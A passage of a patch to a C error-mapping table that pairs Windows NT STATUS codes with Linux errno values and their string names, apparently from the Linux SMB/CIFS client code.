+-	{STATUS_TOO_LATE, -EIO, "STATUS_TOO_LATE"},
+-	{STATUS_NO_TRUST_LSA_SECRET, -EIO, "STATUS_NO_TRUST_LSA_SECRET"},
+-	{STATUS_NO_TRUST_SAM_ACCOUNT, -EIO, "STATUS_NO_TRUST_SAM_ACCOUNT"},
+-	{STATUS_TRUSTED_DOMAIN_FAILURE, -EIO, "STATUS_TRUSTED_DOMAIN_FAILURE"},
+-	{STATUS_TRUSTED_RELATIONSHIP_FAILURE, -EIO,
+-	"STATUS_TRUSTED_RELATIONSHIP_FAILURE"},
+-	{STATUS_EVENTLOG_FILE_CORRUPT, -EIO, "STATUS_EVENTLOG_FILE_CORRUPT"},
+-	{STATUS_EVENTLOG_CANT_START, -EIO, "STATUS_EVENTLOG_CANT_START"},
+-	{STATUS_TRUST_FAILURE, -EIO, "STATUS_TRUST_FAILURE"},
+-	{STATUS_MUTANT_LIMIT_EXCEEDED, -EIO, "STATUS_MUTANT_LIMIT_EXCEEDED"},
+-	{STATUS_NETLOGON_NOT_STARTED, -EIO, "STATUS_NETLOGON_NOT_STARTED"},
+-	{STATUS_ACCOUNT_EXPIRED, -EKEYEXPIRED, "STATUS_ACCOUNT_EXPIRED"},
+-	{STATUS_POSSIBLE_DEADLOCK, -EIO, "STATUS_POSSIBLE_DEADLOCK"},
+-	{STATUS_NETWORK_CREDENTIAL_CONFLICT, -EIO,
+-	"STATUS_NETWORK_CREDENTIAL_CONFLICT"},
+-	{STATUS_REMOTE_SESSION_LIMIT, -EIO, "STATUS_REMOTE_SESSION_LIMIT"},
+-	{STATUS_EVENTLOG_FILE_CHANGED, -EIO, "STATUS_EVENTLOG_FILE_CHANGED"},
+-	{STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT, -EIO,
+-	"STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT"},
+-	{STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, -EIO,
+-	"STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT"},
+-	{STATUS_NOLOGON_SERVER_TRUST_ACCOUNT, -EIO,
+-	"STATUS_NOLOGON_SERVER_TRUST_ACCOUNT"},
+-	{STATUS_DOMAIN_TRUST_INCONSISTENT, -EIO,
+-	"STATUS_DOMAIN_TRUST_INCONSISTENT"},
+-	{STATUS_FS_DRIVER_REQUIRED, -EOPNOTSUPP, "STATUS_FS_DRIVER_REQUIRED"},
+-	{STATUS_IMAGE_ALREADY_LOADED_AS_DLL, -EIO,
+-	"STATUS_IMAGE_ALREADY_LOADED_AS_DLL"},
+-	{STATUS_NETWORK_OPEN_RESTRICTION, -EIO,
+-	"STATUS_NETWORK_OPEN_RESTRICTION"},
+-	{STATUS_NO_USER_SESSION_KEY, -EIO, "STATUS_NO_USER_SESSION_KEY"},
+-	{STATUS_USER_SESSION_DELETED, -EIO, "STATUS_USER_SESSION_DELETED"},
+-	{STATUS_RESOURCE_LANG_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_LANG_NOT_FOUND"},
+-	{STATUS_INSUFF_SERVER_RESOURCES, -EIO,
+-	"STATUS_INSUFF_SERVER_RESOURCES"},
+-	{STATUS_INVALID_BUFFER_SIZE, -EIO, "STATUS_INVALID_BUFFER_SIZE"},
+-	{STATUS_INVALID_ADDRESS_COMPONENT, -EIO,
+-	"STATUS_INVALID_ADDRESS_COMPONENT"},
+-	{STATUS_INVALID_ADDRESS_WILDCARD, -EIO,
+-	"STATUS_INVALID_ADDRESS_WILDCARD"},
+-	{STATUS_TOO_MANY_ADDRESSES, -EIO, "STATUS_TOO_MANY_ADDRESSES"},
+-	{STATUS_ADDRESS_ALREADY_EXISTS, -EADDRINUSE,
+-	"STATUS_ADDRESS_ALREADY_EXISTS"},
+-	{STATUS_ADDRESS_CLOSED, -EIO, "STATUS_ADDRESS_CLOSED"},
+-	{STATUS_CONNECTION_DISCONNECTED, -ECONNABORTED,
+-	"STATUS_CONNECTION_DISCONNECTED"},
+-	{STATUS_CONNECTION_RESET, -ENETRESET, "STATUS_CONNECTION_RESET"},
+-	{STATUS_TOO_MANY_NODES, -EIO, "STATUS_TOO_MANY_NODES"},
+-	{STATUS_TRANSACTION_ABORTED, -EIO, "STATUS_TRANSACTION_ABORTED"},
+-	{STATUS_TRANSACTION_TIMED_OUT, -EIO, "STATUS_TRANSACTION_TIMED_OUT"},
+-	{STATUS_TRANSACTION_NO_RELEASE, -EIO, "STATUS_TRANSACTION_NO_RELEASE"},
+-	{STATUS_TRANSACTION_NO_MATCH, -EIO, "STATUS_TRANSACTION_NO_MATCH"},
+-	{STATUS_TRANSACTION_RESPONDED, -EIO, "STATUS_TRANSACTION_RESPONDED"},
+-	{STATUS_TRANSACTION_INVALID_ID, -EIO, "STATUS_TRANSACTION_INVALID_ID"},
+-	{STATUS_TRANSACTION_INVALID_TYPE, -EIO,
+-	"STATUS_TRANSACTION_INVALID_TYPE"},
+-	{STATUS_NOT_SERVER_SESSION, -EIO, "STATUS_NOT_SERVER_SESSION"},
+-	{STATUS_NOT_CLIENT_SESSION, -EIO, "STATUS_NOT_CLIENT_SESSION"},
+-	{STATUS_CANNOT_LOAD_REGISTRY_FILE, -EIO,
+-	"STATUS_CANNOT_LOAD_REGISTRY_FILE"},
+-	{STATUS_DEBUG_ATTACH_FAILED, -EIO, "STATUS_DEBUG_ATTACH_FAILED"},
+-	{STATUS_SYSTEM_PROCESS_TERMINATED, -EIO,
+-	"STATUS_SYSTEM_PROCESS_TERMINATED"},
+-	{STATUS_DATA_NOT_ACCEPTED, -EIO, "STATUS_DATA_NOT_ACCEPTED"},
+-	{STATUS_NO_BROWSER_SERVERS_FOUND, -EIO,
+-	"STATUS_NO_BROWSER_SERVERS_FOUND"},
+-	{STATUS_VDM_HARD_ERROR, -EIO, "STATUS_VDM_HARD_ERROR"},
+-	{STATUS_DRIVER_CANCEL_TIMEOUT, -EIO, "STATUS_DRIVER_CANCEL_TIMEOUT"},
+-	{STATUS_REPLY_MESSAGE_MISMATCH, -EIO, "STATUS_REPLY_MESSAGE_MISMATCH"},
+-	{STATUS_MAPPED_ALIGNMENT, -EIO, "STATUS_MAPPED_ALIGNMENT"},
+-	{STATUS_IMAGE_CHECKSUM_MISMATCH, -EIO,
+-	"STATUS_IMAGE_CHECKSUM_MISMATCH"},
+-	{STATUS_LOST_WRITEBEHIND_DATA, -EIO, "STATUS_LOST_WRITEBEHIND_DATA"},
+-	{STATUS_CLIENT_SERVER_PARAMETERS_INVALID, -EIO,
+-	"STATUS_CLIENT_SERVER_PARAMETERS_INVALID"},
+-	{STATUS_PASSWORD_MUST_CHANGE, -EIO, "STATUS_PASSWORD_MUST_CHANGE"},
+-	{STATUS_NOT_FOUND, -ENOENT, "STATUS_NOT_FOUND"},
+-	{STATUS_NOT_TINY_STREAM, -EIO, "STATUS_NOT_TINY_STREAM"},
+-	{STATUS_RECOVERY_FAILURE, -EIO, "STATUS_RECOVERY_FAILURE"},
+-	{STATUS_STACK_OVERFLOW_READ, -EIO, "STATUS_STACK_OVERFLOW_READ"},
+-	{STATUS_FAIL_CHECK, -EIO, "STATUS_FAIL_CHECK"},
+-	{STATUS_DUPLICATE_OBJECTID, -EIO, "STATUS_DUPLICATE_OBJECTID"},
+-	{STATUS_OBJECTID_EXISTS, -EIO, "STATUS_OBJECTID_EXISTS"},
+-	{STATUS_CONVERT_TO_LARGE, -EIO, "STATUS_CONVERT_TO_LARGE"},
+-	{STATUS_RETRY, -EAGAIN, "STATUS_RETRY"},
+-	{STATUS_FOUND_OUT_OF_SCOPE, -EIO, "STATUS_FOUND_OUT_OF_SCOPE"},
+-	{STATUS_ALLOCATE_BUCKET, -EIO, "STATUS_ALLOCATE_BUCKET"},
+-	{STATUS_PROPSET_NOT_FOUND, -EIO, "STATUS_PROPSET_NOT_FOUND"},
+-	{STATUS_MARSHALL_OVERFLOW, -EIO, "STATUS_MARSHALL_OVERFLOW"},
+-	{STATUS_INVALID_VARIANT, -EIO, "STATUS_INVALID_VARIANT"},
+-	{STATUS_DOMAIN_CONTROLLER_NOT_FOUND, -EIO,
+-	"STATUS_DOMAIN_CONTROLLER_NOT_FOUND"},
+-	{STATUS_ACCOUNT_LOCKED_OUT, -EACCES, "STATUS_ACCOUNT_LOCKED_OUT"},
+-	{STATUS_HANDLE_NOT_CLOSABLE, -EIO, "STATUS_HANDLE_NOT_CLOSABLE"},
+-	{STATUS_CONNECTION_REFUSED, -EIO, "STATUS_CONNECTION_REFUSED"},
+-	{STATUS_GRACEFUL_DISCONNECT, -EIO, "STATUS_GRACEFUL_DISCONNECT"},
+-	{STATUS_ADDRESS_ALREADY_ASSOCIATED, -EIO,
+-	"STATUS_ADDRESS_ALREADY_ASSOCIATED"},
+-	{STATUS_ADDRESS_NOT_ASSOCIATED, -EIO, "STATUS_ADDRESS_NOT_ASSOCIATED"},
+-	{STATUS_CONNECTION_INVALID, -EIO, "STATUS_CONNECTION_INVALID"},
+-	{STATUS_CONNECTION_ACTIVE, -EIO, "STATUS_CONNECTION_ACTIVE"},
+-	{STATUS_NETWORK_UNREACHABLE, -ENETUNREACH,
+-	"STATUS_NETWORK_UNREACHABLE"},
+-	{STATUS_HOST_UNREACHABLE, -EHOSTDOWN, "STATUS_HOST_UNREACHABLE"},
+-	{STATUS_PROTOCOL_UNREACHABLE, -ENETUNREACH,
+-	"STATUS_PROTOCOL_UNREACHABLE"},
+-	{STATUS_PORT_UNREACHABLE, -ENETUNREACH, "STATUS_PORT_UNREACHABLE"},
+-	{STATUS_REQUEST_ABORTED, -EIO, "STATUS_REQUEST_ABORTED"},
+-	{STATUS_CONNECTION_ABORTED, -ECONNABORTED, "STATUS_CONNECTION_ABORTED"},
+-	{STATUS_BAD_COMPRESSION_BUFFER, -EIO, "STATUS_BAD_COMPRESSION_BUFFER"},
+-	{STATUS_USER_MAPPED_FILE, -EIO, "STATUS_USER_MAPPED_FILE"},
+-	{STATUS_AUDIT_FAILED, -EIO, "STATUS_AUDIT_FAILED"},
+-	{STATUS_TIMER_RESOLUTION_NOT_SET, -EIO,
+-	"STATUS_TIMER_RESOLUTION_NOT_SET"},
+-	{STATUS_CONNECTION_COUNT_LIMIT, -EIO, "STATUS_CONNECTION_COUNT_LIMIT"},
+-	{STATUS_LOGIN_TIME_RESTRICTION, -EACCES,
+-	"STATUS_LOGIN_TIME_RESTRICTION"},
+-	{STATUS_LOGIN_WKSTA_RESTRICTION, -EACCES,
+-	"STATUS_LOGIN_WKSTA_RESTRICTION"},
+-	{STATUS_IMAGE_MP_UP_MISMATCH, -EIO, "STATUS_IMAGE_MP_UP_MISMATCH"},
+-	{STATUS_INSUFFICIENT_LOGON_INFO, -EIO,
+-	"STATUS_INSUFFICIENT_LOGON_INFO"},
+-	{STATUS_BAD_DLL_ENTRYPOINT, -EIO, "STATUS_BAD_DLL_ENTRYPOINT"},
+-	{STATUS_BAD_SERVICE_ENTRYPOINT, -EIO, "STATUS_BAD_SERVICE_ENTRYPOINT"},
+-	{STATUS_LPC_REPLY_LOST, -EIO, "STATUS_LPC_REPLY_LOST"},
+-	{STATUS_IP_ADDRESS_CONFLICT1, -EIO, "STATUS_IP_ADDRESS_CONFLICT1"},
+-	{STATUS_IP_ADDRESS_CONFLICT2, -EIO, "STATUS_IP_ADDRESS_CONFLICT2"},
+-	{STATUS_REGISTRY_QUOTA_LIMIT, -EDQUOT, "STATUS_REGISTRY_QUOTA_LIMIT"},
+-	{STATUS_PATH_NOT_COVERED, -EREMOTE, "STATUS_PATH_NOT_COVERED"},
+-	{STATUS_NO_CALLBACK_ACTIVE, -EIO, "STATUS_NO_CALLBACK_ACTIVE"},
+-	{STATUS_LICENSE_QUOTA_EXCEEDED, -EACCES,
+-	"STATUS_LICENSE_QUOTA_EXCEEDED"},
+-	{STATUS_PWD_TOO_SHORT, -EIO, "STATUS_PWD_TOO_SHORT"},
+-	{STATUS_PWD_TOO_RECENT, -EIO, "STATUS_PWD_TOO_RECENT"},
+-	{STATUS_PWD_HISTORY_CONFLICT, -EIO, "STATUS_PWD_HISTORY_CONFLICT"},
+-	{STATUS_PLUGPLAY_NO_DEVICE, -EIO, "STATUS_PLUGPLAY_NO_DEVICE"},
+-	{STATUS_UNSUPPORTED_COMPRESSION, -EIO,
+-	"STATUS_UNSUPPORTED_COMPRESSION"},
+-	{STATUS_INVALID_HW_PROFILE, -EIO, "STATUS_INVALID_HW_PROFILE"},
+-	{STATUS_INVALID_PLUGPLAY_DEVICE_PATH, -EIO,
+-	"STATUS_INVALID_PLUGPLAY_DEVICE_PATH"},
+-	{STATUS_DRIVER_ORDINAL_NOT_FOUND, -EIO,
+-	"STATUS_DRIVER_ORDINAL_NOT_FOUND"},
+-	{STATUS_DRIVER_ENTRYPOINT_NOT_FOUND, -EIO,
+-	"STATUS_DRIVER_ENTRYPOINT_NOT_FOUND"},
+-	{STATUS_RESOURCE_NOT_OWNED, -EIO, "STATUS_RESOURCE_NOT_OWNED"},
+-	{STATUS_TOO_MANY_LINKS, -EMLINK, "STATUS_TOO_MANY_LINKS"},
+-	{STATUS_QUOTA_LIST_INCONSISTENT, -EIO,
+-	"STATUS_QUOTA_LIST_INCONSISTENT"},
+-	{STATUS_FILE_IS_OFFLINE, -EIO, "STATUS_FILE_IS_OFFLINE"},
+-	{STATUS_EVALUATION_EXPIRATION, -EIO, "STATUS_EVALUATION_EXPIRATION"},
+-	{STATUS_ILLEGAL_DLL_RELOCATION, -EIO, "STATUS_ILLEGAL_DLL_RELOCATION"},
+-	{STATUS_LICENSE_VIOLATION, -EIO, "STATUS_LICENSE_VIOLATION"},
+-	{STATUS_DLL_INIT_FAILED_LOGOFF, -EIO, "STATUS_DLL_INIT_FAILED_LOGOFF"},
+-	{STATUS_DRIVER_UNABLE_TO_LOAD, -EIO, "STATUS_DRIVER_UNABLE_TO_LOAD"},
+-	{STATUS_DFS_UNAVAILABLE, -EIO, "STATUS_DFS_UNAVAILABLE"},
+-	{STATUS_VOLUME_DISMOUNTED, -EIO, "STATUS_VOLUME_DISMOUNTED"},
+-	{STATUS_WX86_INTERNAL_ERROR, -EIO, "STATUS_WX86_INTERNAL_ERROR"},
+-	{STATUS_WX86_FLOAT_STACK_CHECK, -EIO, "STATUS_WX86_FLOAT_STACK_CHECK"},
+-	{STATUS_VALIDATE_CONTINUE, -EIO, "STATUS_VALIDATE_CONTINUE"},
+-	{STATUS_NO_MATCH, -EIO, "STATUS_NO_MATCH"},
+-	{STATUS_NO_MORE_MATCHES, -EIO, "STATUS_NO_MORE_MATCHES"},
+-	{STATUS_NOT_A_REPARSE_POINT, -EIO, "STATUS_NOT_A_REPARSE_POINT"},
+-	{STATUS_IO_REPARSE_TAG_INVALID, -EIO, "STATUS_IO_REPARSE_TAG_INVALID"},
+-	{STATUS_IO_REPARSE_TAG_MISMATCH, -EIO,
+-	"STATUS_IO_REPARSE_TAG_MISMATCH"},
+-	{STATUS_IO_REPARSE_DATA_INVALID, -EIO,
+-	"STATUS_IO_REPARSE_DATA_INVALID"},
+-	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EIO,
+-	"STATUS_IO_REPARSE_TAG_NOT_HANDLED"},
+-	{STATUS_REPARSE_POINT_NOT_RESOLVED, -EIO,
+-	"STATUS_REPARSE_POINT_NOT_RESOLVED"},
+-	{STATUS_DIRECTORY_IS_A_REPARSE_POINT, -EIO,
+-	"STATUS_DIRECTORY_IS_A_REPARSE_POINT"},
+-	{STATUS_RANGE_LIST_CONFLICT, -EIO, "STATUS_RANGE_LIST_CONFLICT"},
+-	{STATUS_SOURCE_ELEMENT_EMPTY, -EIO, "STATUS_SOURCE_ELEMENT_EMPTY"},
+-	{STATUS_DESTINATION_ELEMENT_FULL, -EIO,
+-	"STATUS_DESTINATION_ELEMENT_FULL"},
+-	{STATUS_ILLEGAL_ELEMENT_ADDRESS, -EIO,
+-	"STATUS_ILLEGAL_ELEMENT_ADDRESS"},
+-	{STATUS_MAGAZINE_NOT_PRESENT, -EIO, "STATUS_MAGAZINE_NOT_PRESENT"},
+-	{STATUS_REINITIALIZATION_NEEDED, -EIO,
+-	"STATUS_REINITIALIZATION_NEEDED"},
+-	{STATUS_ENCRYPTION_FAILED, -EIO, "STATUS_ENCRYPTION_FAILED"},
+-	{STATUS_DECRYPTION_FAILED, -EIO, "STATUS_DECRYPTION_FAILED"},
+-	{STATUS_RANGE_NOT_FOUND, -EIO, "STATUS_RANGE_NOT_FOUND"},
+-	{STATUS_NO_RECOVERY_POLICY, -EIO, "STATUS_NO_RECOVERY_POLICY"},
+-	{STATUS_NO_EFS, -EIO, "STATUS_NO_EFS"},
+-	{STATUS_WRONG_EFS, -EIO, "STATUS_WRONG_EFS"},
+-	{STATUS_NO_USER_KEYS, -EIO, "STATUS_NO_USER_KEYS"},
+-	{STATUS_FILE_NOT_ENCRYPTED, -EIO, "STATUS_FILE_NOT_ENCRYPTED"},
+-	{STATUS_NOT_EXPORT_FORMAT, -EIO, "STATUS_NOT_EXPORT_FORMAT"},
+-	{STATUS_FILE_ENCRYPTED, -EIO, "STATUS_FILE_ENCRYPTED"},
+-	{STATUS_WMI_GUID_NOT_FOUND, -EIO, "STATUS_WMI_GUID_NOT_FOUND"},
+-	{STATUS_WMI_INSTANCE_NOT_FOUND, -EIO, "STATUS_WMI_INSTANCE_NOT_FOUND"},
+-	{STATUS_WMI_ITEMID_NOT_FOUND, -EIO, "STATUS_WMI_ITEMID_NOT_FOUND"},
+-	{STATUS_WMI_TRY_AGAIN, -EIO, "STATUS_WMI_TRY_AGAIN"},
+-	{STATUS_SHARED_POLICY, -EIO, "STATUS_SHARED_POLICY"},
+-	{STATUS_POLICY_OBJECT_NOT_FOUND, -EIO,
+-	"STATUS_POLICY_OBJECT_NOT_FOUND"},
+-	{STATUS_POLICY_ONLY_IN_DS, -EIO, "STATUS_POLICY_ONLY_IN_DS"},
+-	{STATUS_VOLUME_NOT_UPGRADED, -EIO, "STATUS_VOLUME_NOT_UPGRADED"},
+-	{STATUS_REMOTE_STORAGE_NOT_ACTIVE, -EIO,
+-	"STATUS_REMOTE_STORAGE_NOT_ACTIVE"},
+-	{STATUS_REMOTE_STORAGE_MEDIA_ERROR, -EIO,
+-	"STATUS_REMOTE_STORAGE_MEDIA_ERROR"},
+-	{STATUS_NO_TRACKING_SERVICE, -EIO, "STATUS_NO_TRACKING_SERVICE"},
+-	{STATUS_SERVER_SID_MISMATCH, -EIO, "STATUS_SERVER_SID_MISMATCH"},
+-	{STATUS_DS_NO_ATTRIBUTE_OR_VALUE, -EIO,
+-	"STATUS_DS_NO_ATTRIBUTE_OR_VALUE"},
+-	{STATUS_DS_INVALID_ATTRIBUTE_SYNTAX, -EIO,
+-	"STATUS_DS_INVALID_ATTRIBUTE_SYNTAX"},
+-	{STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED, -EIO,
+-	"STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED"},
+-	{STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS, -EIO,
+-	"STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS"},
+-	{STATUS_DS_BUSY, -EBUSY, "STATUS_DS_BUSY"},
+-	{STATUS_DS_UNAVAILABLE, -EIO, "STATUS_DS_UNAVAILABLE"},
+-	{STATUS_DS_NO_RIDS_ALLOCATED, -EIO, "STATUS_DS_NO_RIDS_ALLOCATED"},
+-	{STATUS_DS_NO_MORE_RIDS, -EIO, "STATUS_DS_NO_MORE_RIDS"},
+-	{STATUS_DS_INCORRECT_ROLE_OWNER, -EIO,
+-	"STATUS_DS_INCORRECT_ROLE_OWNER"},
+-	{STATUS_DS_RIDMGR_INIT_ERROR, -EIO, "STATUS_DS_RIDMGR_INIT_ERROR"},
+-	{STATUS_DS_OBJ_CLASS_VIOLATION, -EIO, "STATUS_DS_OBJ_CLASS_VIOLATION"},
+-	{STATUS_DS_CANT_ON_NON_LEAF, -EIO, "STATUS_DS_CANT_ON_NON_LEAF"},
+-	{STATUS_DS_CANT_ON_RDN, -EIO, "STATUS_DS_CANT_ON_RDN"},
+-	{STATUS_DS_CANT_MOD_OBJ_CLASS, -EIO, "STATUS_DS_CANT_MOD_OBJ_CLASS"},
+-	{STATUS_DS_CROSS_DOM_MOVE_FAILED, -EIO,
+-	"STATUS_DS_CROSS_DOM_MOVE_FAILED"},
+-	{STATUS_DS_GC_NOT_AVAILABLE, -EIO, "STATUS_DS_GC_NOT_AVAILABLE"},
+-	{STATUS_DIRECTORY_SERVICE_REQUIRED, -EIO,
+-	"STATUS_DIRECTORY_SERVICE_REQUIRED"},
+-	{STATUS_REPARSE_ATTRIBUTE_CONFLICT, -EIO,
+-	"STATUS_REPARSE_ATTRIBUTE_CONFLICT"},
+-	{STATUS_CANT_ENABLE_DENY_ONLY, -EIO, "STATUS_CANT_ENABLE_DENY_ONLY"},
+-	{STATUS_FLOAT_MULTIPLE_FAULTS, -EIO, "STATUS_FLOAT_MULTIPLE_FAULTS"},
+-	{STATUS_FLOAT_MULTIPLE_TRAPS, -EIO, "STATUS_FLOAT_MULTIPLE_TRAPS"},
+-	{STATUS_DEVICE_REMOVED, -EIO, "STATUS_DEVICE_REMOVED"},
+-	{STATUS_JOURNAL_DELETE_IN_PROGRESS, -EIO,
+-	"STATUS_JOURNAL_DELETE_IN_PROGRESS"},
+-	{STATUS_JOURNAL_NOT_ACTIVE, -EIO, "STATUS_JOURNAL_NOT_ACTIVE"},
+-	{STATUS_NOINTERFACE, -EIO, "STATUS_NOINTERFACE"},
+-	{STATUS_DS_ADMIN_LIMIT_EXCEEDED, -EIO,
+-	"STATUS_DS_ADMIN_LIMIT_EXCEEDED"},
+-	{STATUS_DRIVER_FAILED_SLEEP, -EIO, "STATUS_DRIVER_FAILED_SLEEP"},
+-	{STATUS_MUTUAL_AUTHENTICATION_FAILED, -EIO,
+-	"STATUS_MUTUAL_AUTHENTICATION_FAILED"},
+-	{STATUS_CORRUPT_SYSTEM_FILE, -EIO, "STATUS_CORRUPT_SYSTEM_FILE"},
+-	{STATUS_DATATYPE_MISALIGNMENT_ERROR, -EIO,
+-	"STATUS_DATATYPE_MISALIGNMENT_ERROR"},
+-	{STATUS_WMI_READ_ONLY, -EROFS, "STATUS_WMI_READ_ONLY"},
+-	{STATUS_WMI_SET_FAILURE, -EIO, "STATUS_WMI_SET_FAILURE"},
+-	{STATUS_COMMITMENT_MINIMUM, -EIO, "STATUS_COMMITMENT_MINIMUM"},
+-	{STATUS_REG_NAT_CONSUMPTION, -EIO, "STATUS_REG_NAT_CONSUMPTION"},
+-	{STATUS_TRANSPORT_FULL, -EIO, "STATUS_TRANSPORT_FULL"},
+-	{STATUS_DS_SAM_INIT_FAILURE, -EIO, "STATUS_DS_SAM_INIT_FAILURE"},
+-	{STATUS_ONLY_IF_CONNECTED, -EIO, "STATUS_ONLY_IF_CONNECTED"},
+-	{STATUS_DS_SENSITIVE_GROUP_VIOLATION, -EIO,
+-	"STATUS_DS_SENSITIVE_GROUP_VIOLATION"},
+-	{STATUS_PNP_RESTART_ENUMERATION, -EIO,
+-	"STATUS_PNP_RESTART_ENUMERATION"},
+-	{STATUS_JOURNAL_ENTRY_DELETED, -EIO, "STATUS_JOURNAL_ENTRY_DELETED"},
+-	{STATUS_DS_CANT_MOD_PRIMARYGROUPID, -EIO,
+-	"STATUS_DS_CANT_MOD_PRIMARYGROUPID"},
+-	{STATUS_SYSTEM_IMAGE_BAD_SIGNATURE, -EIO,
+-	"STATUS_SYSTEM_IMAGE_BAD_SIGNATURE"},
+-	{STATUS_PNP_REBOOT_REQUIRED, -EIO, "STATUS_PNP_REBOOT_REQUIRED"},
+-	{STATUS_POWER_STATE_INVALID, -EIO, "STATUS_POWER_STATE_INVALID"},
+-	{STATUS_DS_INVALID_GROUP_TYPE, -EIO, "STATUS_DS_INVALID_GROUP_TYPE"},
+-	{STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN, -EIO,
+-	"STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN"},
+-	{STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN, -EIO,
+-	"STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN"},
+-	{STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
+-	"STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER"},
+-	{STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
+-	"STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER"},
+-	{STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
+-	"STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER"},
+-	{STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER, -EIO,
+-	"STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER"},
+-	{STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER, -EIO,
+-	"STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER"},
+-	{STATUS_DS_HAVE_PRIMARY_MEMBERS, -EIO,
+-	"STATUS_DS_HAVE_PRIMARY_MEMBERS"},
+-	{STATUS_WMI_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_WMI_NOT_SUPPORTED"},
+-	{STATUS_INSUFFICIENT_POWER, -EIO, "STATUS_INSUFFICIENT_POWER"},
+-	{STATUS_SAM_NEED_BOOTKEY_PASSWORD, -EIO,
+-	"STATUS_SAM_NEED_BOOTKEY_PASSWORD"},
+-	{STATUS_SAM_NEED_BOOTKEY_FLOPPY, -EIO,
+-	"STATUS_SAM_NEED_BOOTKEY_FLOPPY"},
+-	{STATUS_DS_CANT_START, -EIO, "STATUS_DS_CANT_START"},
+-	{STATUS_DS_INIT_FAILURE, -EIO, "STATUS_DS_INIT_FAILURE"},
+-	{STATUS_SAM_INIT_FAILURE, -EIO, "STATUS_SAM_INIT_FAILURE"},
+-	{STATUS_DS_GC_REQUIRED, -EIO, "STATUS_DS_GC_REQUIRED"},
+-	{STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY, -EIO,
+-	"STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY"},
+-	{STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS, -EIO,
+-	"STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS"},
+-	{STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED"},
+-	{STATUS_MULTIPLE_FAULT_VIOLATION, -EIO,
+-	"STATUS_MULTIPLE_FAULT_VIOLATION"},
+-	{STATUS_CURRENT_DOMAIN_NOT_ALLOWED, -EIO,
+-	"STATUS_CURRENT_DOMAIN_NOT_ALLOWED"},
+-	{STATUS_CANNOT_MAKE, -EIO, "STATUS_CANNOT_MAKE"},
+-	{STATUS_SYSTEM_SHUTDOWN, -EIO, "STATUS_SYSTEM_SHUTDOWN"},
+-	{STATUS_DS_INIT_FAILURE_CONSOLE, -EIO,
+-	"STATUS_DS_INIT_FAILURE_CONSOLE"},
+-	{STATUS_DS_SAM_INIT_FAILURE_CONSOLE, -EIO,
+-	"STATUS_DS_SAM_INIT_FAILURE_CONSOLE"},
+-	{STATUS_UNFINISHED_CONTEXT_DELETED, -EIO,
+-	"STATUS_UNFINISHED_CONTEXT_DELETED"},
+-	{STATUS_NO_TGT_REPLY, -EIO, "STATUS_NO_TGT_REPLY"},
+-	/* Note that ENOATTTR and ENODATA are the same errno */
+-	{STATUS_OBJECTID_NOT_FOUND, -ENODATA, "STATUS_OBJECTID_NOT_FOUND"},
+-	{STATUS_NO_IP_ADDRESSES, -EIO, "STATUS_NO_IP_ADDRESSES"},
+-	{STATUS_WRONG_CREDENTIAL_HANDLE, -EIO,
+-	"STATUS_WRONG_CREDENTIAL_HANDLE"},
+-	{STATUS_CRYPTO_SYSTEM_INVALID, -EIO, "STATUS_CRYPTO_SYSTEM_INVALID"},
+-	{STATUS_MAX_REFERRALS_EXCEEDED, -EIO, "STATUS_MAX_REFERRALS_EXCEEDED"},
+-	{STATUS_MUST_BE_KDC, -EIO, "STATUS_MUST_BE_KDC"},
+-	{STATUS_STRONG_CRYPTO_NOT_SUPPORTED, -EIO,
+-	"STATUS_STRONG_CRYPTO_NOT_SUPPORTED"},
+-	{STATUS_TOO_MANY_PRINCIPALS, -EIO, "STATUS_TOO_MANY_PRINCIPALS"},
+-	{STATUS_NO_PA_DATA, -EIO, "STATUS_NO_PA_DATA"},
+-	{STATUS_PKINIT_NAME_MISMATCH, -EIO, "STATUS_PKINIT_NAME_MISMATCH"},
+-	{STATUS_SMARTCARD_LOGON_REQUIRED, -EIO,
+-	"STATUS_SMARTCARD_LOGON_REQUIRED"},
+-	{STATUS_KDC_INVALID_REQUEST, -EIO, "STATUS_KDC_INVALID_REQUEST"},
+-	{STATUS_KDC_UNABLE_TO_REFER, -EIO, "STATUS_KDC_UNABLE_TO_REFER"},
+-	{STATUS_KDC_UNKNOWN_ETYPE, -EIO, "STATUS_KDC_UNKNOWN_ETYPE"},
+-	{STATUS_SHUTDOWN_IN_PROGRESS, -EIO, "STATUS_SHUTDOWN_IN_PROGRESS"},
+-	{STATUS_SERVER_SHUTDOWN_IN_PROGRESS, -EIO,
+-	"STATUS_SERVER_SHUTDOWN_IN_PROGRESS"},
+-	{STATUS_NOT_SUPPORTED_ON_SBS, -EOPNOTSUPP,
